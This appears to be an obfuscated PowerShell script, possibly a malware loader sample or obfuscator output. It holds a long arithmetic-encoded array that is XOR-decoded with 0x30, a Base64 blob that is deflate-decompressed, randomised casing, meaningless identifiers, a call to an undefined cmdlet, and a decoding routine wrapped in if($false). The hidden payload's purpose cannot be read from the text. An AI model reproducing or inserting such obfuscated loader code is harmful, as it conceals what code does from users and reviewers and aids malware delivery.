(20-18),(35-21),( 58-50), ( 11 -11),( 19 - 5),( 57-48), ( 57 -53),(55 +48), (65-64), (90 -89), (76- 69),( 77+ 11),(33 - 32),(5 - 5),(81 - 79),( 40+54), ( 3-2),(43-41),(37- 37), (75 + 2), (79- 70), (53 -46), (54 + 49), ( 87-80), (41 -35),( 98 - 70), ( 9 - 4),( 74 -73), ( 78+16), ( 56 -55),(32-30),(44 -42),( 88 + 6), ( 91 - 84),(74-74),( 36-22),(32- 25),( 57 -49), (73 +9),( 72- 71), ( 64 - 62),( 78- 78),( 92- 78),(91 -90), (88 - 87), (88 - 81), (66 +11),( 19 -14), (41 -33), ( 74+3), (49 - 48), ( 36-35),(61-55), (72 +3),( 37- 36), (10-8),(100-97),(5+98), (30 - 29), ( 44-43), (50 -48),( 12 +91), ( 87 - 79),(10-3), ( 96+ 27),( 38-32), ( 30- 28),( 67 +35),(25- 17), (24 - 18), ( 62+ 61), (82 - 77), ( 5+ 2), (17+58), (16- 15), ( 69 - 69), ( 64 -55), (72 +3), ( 70 - 69), (31-31), ( 98- 94),(1+ 93),(18- 17),( 76 -76), ( 14-11), (49 +53), (64 - 56),(8-8), ( 80 - 66), (52- 51), ( 3 - 3),(10- 7),(76-48), (28 -27), ( 72 - 71),(90 - 82),82, ( 9 - 4),(8-8),(15+ 13),(22- 15),(52 - 48),(23-9), (91 -86),( 24 - 24),( 49 +53), (56 -52),(85-76),(39+ 43), ( 13-4), ( 8- 4),( 19 + 104),(77-71),(71 -63), (11 + 77),(69- 64),(39-36), (57- 29),( 26-21),(27 -22), (48 -34),( 61- 60),( 20 -18), ( 16 -16),( 2 +75), (22-15), (89 -80),( 1+122),(91- 90),(42- 40), ( 45 -41),( 53 +49), (58-51), (16- 11),( 71 +17),(80- 75), (26 - 24),( 88 +14),( 4+3),( 53 - 45),(18 -4),( 52-47),(74 - 69), ( 44 + 44),(30 - 24),(94-90),( 54+40), ( 23 -16),( 82-74),( 43+ 32),(74-73), (40-40),(20 -18),(11+91),(73 - 72),( 35-33),( 70- 67), (74 + 29),(47 - 46),( 33 -32), (46 - 46),( 24 + 4), (60 - 53), 3, (86-58), (10 -9), (40- 39), ( 82- 77),(32+ 62),(94 - 90),( 21 -12),(14 + 68), ( 98 - 93), ( 42 -35),( 48 -34),(42 -41), (39- 39), (43-38), (3+ 120),(51-47), ( 68 - 59),(79-2), (56 -49),( 94- 87), ( 15 + 62), (11- 7), (82 -73), (77 - 49), ( 22- 16),( 37- 28), (24+ 53), (3 +6),( 23 - 19),( 47 +56),(71-70),( 49- 48), (19 -10),(9 + 85),( 66- 58), ( 33 - 30), (68+ 26), ( 41 -34),(78-78),(1+ 74),(92- 84),( 49 -43),(58 +65), (77-68), (86 - 81), (95 - 67), (94 -87), ( 12-5), (98 -70),( 38 -32),(94 - 91),(21 +102),(70 - 69), ( 66 - 66),( 18 - 9), (9+ 94),(26 - 25),(94-92), ( 14 - 9),(97- 69), ( 26-25),( 66 - 64), (37 - 35), (65 + 10),(20 -13),( 75 - 68), ( 96- 8), ( 29- 21),(83 - 82), (16+78), ( 70 -65),(39-33), ( 69 + 54),(27 -26), (1 + 1), (5 -5), ( 54 + 23), ( 67 - 60),(61- 55),( 31 - 3),( 77- 70), ( 24-18), (39 +49), ( 85- 78), (74-70),(8+69),( 33-28), (11-11), (41 +41),( 53 -52), ( 20-18), ( 16-13),( 60+22),(97-96), (84 -82),( 27 - 27),(66-38),1,( 61- 61), (6+1), (22+101), ( 67-58),( 38 -36),( 1+122), ( 15-9),( 86 -80),( 12 + 65), ( 96-89),( 69- 63), ( 9+85),(99 -91), (6 -5),(51+72), (84-79), (93 - 87), ( 28 -14), (53 -52), ( 80 -80),( 40 - 35),(92- 10),(22- 21), (6- 5), (33-27), ( 2 + 80), (24 - 16), ( 89 - 82),(37 +86), (82 -73), (78-77), ( 70- 56),( 72 -64), (41- 41), (49 + 74), ( 57- 56),(46-46),(100 -93),(3 + 11), (13 -12),(29- 28),( 84 -83),(79 -51),( 19 - 10),( 42 -34),( 2+121), (68- 60), ( 12 - 6), (85 + 3),( 22- 17),(48-46),( 49 +54), ( 58-50),(54- 45), ( 54+ 49), ( 29 -28), ( 35 -33), ( 97 -94), ( 50+ 44),(94-85),(33- 29), (69 +25), (95 - 86),(67 - 62),( 33+42), ( 16- 10), ( 47-40), ( 99 + 3), ( 39- 30), ( 58 - 50),( 16 +66),( 54-53),( 41 - 41), ( 30 - 29), ( 19+ 56), ( 90-83),(14 - 7),( 61 +16),(66-60),( 48- 43), ( 67+ 56),(100- 99),(45 - 43), (94 -92),(6+8), (39- 38),(92- 92),( 90-90), ( 23 +79), ( 67-60),(37-33), (89- 61), (95-86), (5+4), ( 26+ 97), ( 43- 36), (50-45), ( 86 + 2), ( 40-32), ( 63 -58), ( 95 -18),(100 - 99), ( 0+1), (91 - 82), (36 +39),( 71- 70), ( 14- 14), ( 0 +1), ( 49+ 45), (86- 79), (15-8),(84+39), ( 33 - 27), (64-63), ( 34+43), ( 40 - 32),(35- 33), ( 88+ 6),( 78 -69), (69 -69),( 59- 31),( 4+ 3),(16- 12), (38+ 50),( 97-92), ( 43-43),( 61+ 16), (76 - 69),( 16-8), (64 - 36), ( 45-37),( 75 - 71), (35 + 53),(53-52),( 58-58),(46-37), ( 39 -25), ( 92-83), ( 89-84),( 38 +64), (26- 19), ( 45 -45),( 60 + 34),(31 - 23), ( 78-69),( 33+ 61),(97- 96),(53- 52),( 28 - 24), (89 - 61), ( 6+ 3), (15- 8), ( 68+ 35), ( 3 -2), ( 93 -91),( 19 - 16),(77 + 17),( 100 - 99),( 97 -97), 1,( 28- 14), ( 13-12), (48 - 47),(32-27), ( 66+57), ( 28 - 27), (11-11),( 61-54),(47 + 56),( 54- 50), ( 84-75), (65 + 37), ( 77-71), (55 -52),(61 - 47),(29 -24), ( 5 -1),( 85- 10),( 15-8),(35-27),(24 + 64), ( 62 -53), ( 97- 94), (26 + 77),(89-81), (77-68),( 38+ 56), (31-26),(68-68),(56+ 46),( 95 - 94), ( 40 - 38), ( 42 -37), ( 22+80),(53 -46), ( 93-93), (79+ 44),(96- 89), ( 47 - 46),( 45 +57),( 15 -14),( 99 -97), ( 21- 20),( 9+66), ( 51 -44), ( 32 -25), ( 77- 2),( 74 - 68), (67 -59), (30 + 93), (23- 22),(47-47), (94 -86), ( 13 +15),( 30 - 25),( 30 - 27), (86-9), (28-22), ( 60- 52),( 24+ 64), ( 55 -54), ( 96- 96),( 23- 16),(84 + 4), (41 -35), ( 85 -83),( 71 - 43),(100- 92), (16- 14), (42- 28),( 30 -23), (17-16), ( 60 + 22),( 90 -81),( 76-70),(76 + 47), ( 70 -61),( 56 - 56), ( 78-50),( 87 - 86), (60- 60),( 20 -16), ( 99- 17), (30 - 29),( 30 - 28),(56- 52), ( 51 +51), 7, (83 - 79),( 90 +13),( 44- 37),(89 -82),(20+ 103),( 93 -84),(67 - 60), (73 +21),( 60 - 54),(38 -30),(43+45),( 68-59),(2-1), (96- 8), (53-52),( 57- 55), ( 23 -22),(13+ 81), ( 56-55),(99-97),(77- 75),(6+ 22),(53 -48),( 11- 8), (74+20),(38-37), ( 84 - 83), (39-38),(99 - 5), (2+7), ( 70-70),(18 +76), (16 - 9), ( 25 - 24), (14 + 109),(31- 30),(100-98),(31- 28),( 64-50),(35- 34),( 20-19), ( 48-42),( 30+45),( 50 -41),(84 -77),(43 + 60), ( 24- 16),(77 -77),( 34 -6),( 92-91), ( 23 - 23), ( 91- 82),( 13 +81), ( 90 - 89), ( 97-95), (65 - 60), (38 +65), ( 26 - 25),( 85-84),(85 - 79), ( 18+ 57),(52- 48), ( 6+3),( 19-5),( 95 -94),(7 - 7),( 92 -91),( 62 +41), ( 45 - 39), ( 42- 41),( 11 +92), (88 - 87),( 25-25), ( 22-15),( 55 +47), (69- 68),(17 - 17), (9 - 7), ( 63+25), ( 71-70), (99 -98),( 18- 14),( 58+ 65),(19 -10),( 44 - 43), ( 77-2), ( 56 - 51), (82 -75),( 77 + 5), (48 -43), (35- 28), (5 + 118),(6+ 2),( 93 - 89),(13 +64), (43-37),( 86 -85),( 19+69),( 35-34), (59 -57),(54-53), ( 16 + 78),( 71 -65),( 87- 86),( 4 + 24),( 16 -8), (6- 3),(53+ 41), (57-49),(93 -90),(17+60),7, (99 - 97), (34+69),(59 - 58), (99 -98), ( 91-83),( 34-20),( 40 -33), (5 -3),(43+32),( 16 - 12), (0+8),( 8 + 20), (88 -87), ( 47 - 47),8, (32+ 43), (83- 78),(94-87), ( 71 -43), ( 60 -52), ( 13 - 5), ( 61 - 47), (7- 3),(13-5), (46 +29), ( 59-53), ( 20 - 19),( 83 - 69), ( 63- 55), ( 37 -28),( 12+65), (55 - 54), (58 - 57), ( 22-20), ( 93-11), (56-55), ( 51- 51), (59 -52), ( 75- 61),(31- 30), (50 -48), (71 - 71),( 92+31),(59- 58),(75-74), (29-23), ( 99 -11), ( 73 - 66),( 92-92), ( 39 + 63), (73 -65),(73 - 70),(5+ 83), (93- 87),( 87- 87),( 17 + 85),( 26 -18), (69 -62),( 20+83), ( 82 - 75), (83- 77), ( 32 + 50), (39- 31),(48 - 39),( 73+15), ( 98-93), (92- 86), (64 +18),( 34- 33),(75- 75), (73-68), (78+ 4),( 98 -91),( 47 - 39),(71 - 43),(96-90),( 95-94), (95 - 1),(75-69),(26 - 24),( 93- 79), ( 61 - 53), (29-27), (73 -45),(51- 46), ( 21 -15),(88 + 35),( 24-23), ( 77-77),( 99-94), ( 46 +77), ( 74- 69), (97- 96),(60 +22), ( 2 + 4), (72 -69), (97-69), (40-35), (83 - 77), (61 +21),( 12- 3), ( 81 -81), ( 59+43),( 65-64), (90 -88), (14- 10), ( 100- 25),( 33-32), ( 43 -42), (1 +1),(21 +54), (0 +9), ( 100- 98), ( 13 +75),(69-62),(71 -68), ( 96 -19),(89-83),(0 + 4),( 62+ 40),( 14-9), (20 - 15),(84-7), (70- 61),(11-8),( 66 +57),(91 -82),( 67- 61), ( 60+22), (67-61), ( 19- 14), ( 74-46),( 22 - 14),( 96 -87), ( 10 +78),(71 -70), ( 90- 90), (31- 30),(23+ 65), (30 - 29),( 81- 81), (87-80),(97 + 26), (57 - 52),(92- 89), (8+95), ( 39 -31), (42- 39),( 61 + 42), (93 -88), (92-92), 94, ( 62-57), (19- 10), (75 +19),( 44-37),( 64 - 63), (56-28),( 23 -17), (8 -3),(35+88), ( 65 -56), (18-18),(65+ 17),(45 -44),(94 -92), ( 82-78),( 38 + 39),( 13- 6), ( 79 - 73),( 85+ 18), (71 -66),(2+ 6),( 45+ 32), ( 56 -55), (89- 88),( 76 - 68), (43+ 51), ( 63-62),( 99-99),( 34 - 26),(67 +35), (42 -34), (56- 52), (67 + 27),( 20 -14), ( 0 +9),(7+ 87), (27-21), ( 82 - 76),( 67 + 8), ( 63- 54), (99-94), (32+71),(48 -40),(33-30), (91+ 12), ( 97 - 88),(25 - 18), ( 20 + 55),( 47-46), (37-37), (56-48), ( 36 + 46),(54 -49), ( 80-72),(37+66),(76-75), (69- 68),( 69-63), (38 + 85), ( 70- 65), (51-44),(15 +67), (54 -48), (13-7),( 21+56),( 89 -81), (8 - 3),(65+23), (54 - 47), (100- 96), (3+ 11), (67-61),(44 - 40),( 83-1),(80 - 79),( 16 - 16), ( 5-2),( 36 - 8),(69 -62), ( 85- 81),( 14 + 89), (82 - 81), (59 -59), (61 -57), ( 20+ 8),( 46-45), (21 - 20), (13 -11),(5 +97), ( 67- 58),( 40 -36), ( 36+ 46), ( 69- 68),( 62 - 61),(99 - 95), ( 8+ 69),( 73-65), ( 72 -68),( 53 + 50),( 76-70), (60-57), (18+85), ( 26- 18), ( 5+ 2), ( 60 +17), (90 - 89), ( 11-11),( 4-4),( 68 + 55),(46 -39),( 31 - 27),( 63-35),(27-22),( 36-31),(36 +46), ( 91 -86), (8 -4), ( 88 - 74), ( 13 - 5), ( 0 + 7),(13 +1),(82- 81),(60 - 60), ( 29 -27), ( 39 +49), ( 39- 32), ( 70 -66),( 72 +22), (86-78),(58- 51),(73 + 50), ( 8-7),(44 - 43), (6-4),( 75 + 7), ( 63-62), (5- 5),(35 -31),( 8 +115),( 29 - 21),( 16- 10),( 1 +76), ( 69-64),(1+8),( 14 + 14),( 77 -71),( 45-40),( 29 +74), (81-75), (17- 15), ( 68 -40),( 26- 25), (24-24),( 92- 89),(57+20),(57 -56), (5 - 5),(78 - 69),( 58+ 30),(0+ 1),( 58-58),(5+ 1),( 21+102),( 8- 7),( 20- 18), (78 -77), ( 72 + 30), ( 71-64),( 31-22),( 4+ 78), ( 89 - 88),(36 - 36), ( 55- 50),(64+ 18), ( 83- 74),(57-53),( 99 - 5), ( 22-14),(82 -79),(15 + 67),(49- 48), ( 72 -72), (35 - 35), ( 58+65), (84 -83),( 91 -89), (58-53), ( 80 +8),1, ( 93 -92),(57 - 51),(72 +22), (13 -12), ( 13- 11), ( 6 -1),( 54 + 28), (29 -21), (9 - 4),( 90- 62),( 0+ 6), ( 17- 13), ( 20 -6), (57 - 51), ( 59 -50), ( 69+34),(39 -35),(49 -40), ( 20 +62),( 76-75),(23 -22), ( 40- 31),(48 + 55), (77 - 73), ( 63-54), ( 74+ 49), (40 -39),( 60-60),( 40-34), (90 +33),( 51 -45), ( 86- 77), (49 +39),( 19- 13),(41-41), ( 82 +21),(44 -36), ( 4+5),( 39 + 36), (86- 85),( 71 - 69),( 30-25),(73 -59),(86- 85), ( 56 - 54), ( 90- 89),( 58 + 19),(53-52), ( 25 - 23),( 89 - 89), (53+ 70),(30 -21), (85 - 80), ( 29+ 65), ( 37- 28),( 73- 73), (92+ 10),( 20-14),( 81- 76), (38+ 65), (67- 59), ( 83-83),(56- 42), ( 99- 91), ( 18- 15),(100 - 25),(100 - 97), 9)
$PKafMT =$XujA| FOrEacH { [cHaR]( $_ -bxor 0x30)}
$PKafMT =$PKafMT -JoiN'' 
tecs -jJac 'toHbOF' -raCLXDO $PKafMT -mQlR 'xlCpyE'
 $yFGJQna='HcvBCoJAEAbge0/xI0G3ZVc2kKAH6TjipIObE7Nj4tuXnT++s3Fdi+OO5qEr5kU3iF8qmKqwwRUjO2YphQf0OwjOZmpSHT7R8ucXmcnP9XOUiUEjQ5/IMcj71sYYuhTyNaSUm9MX'
fuNcTioN STXrW { 
    [ CmdlEtBInDInG() ]pARam( 
        [PaRamEtER(VALueFroMPIpEliNe)]
        $gbNkHOwZ,
        [PaRamEtER(VALueFroMPIpEliNe)]
        $AUZRNop
    )
    If($fALSe){
        $YvnOPZnj= [Io.memOrYSTreaM] [ConvERT]::FromBaSE64StrinG( $AUZRNop ) 
        $YvnOPZnj| ZyDSIYU    
    }
}
fuNcTioN ZyDSIYU { 
    [ CmdlEtBInDInG() ]pARam( 
        [PaRamEtER(VALueFroMPIpEliNe)]
        $TlMyxV
    )
    ( new-oBjecT   Io.STrEAMreAdEr( (new-oBjecT  iO.CoMPreSSIon.deflAteSTReAm( $TlMyxV, [syStEm.Io.COmPREssION.cOMPRessioNmODE]::dEcompReSS)) ,[systEM.TExt.encOdinG]::asCii)).reADToeNd( )| ouT-NulL
}
STXrW -gbNkHOwZ 'nMtJiiw' -AUZRNop $yFGJQna

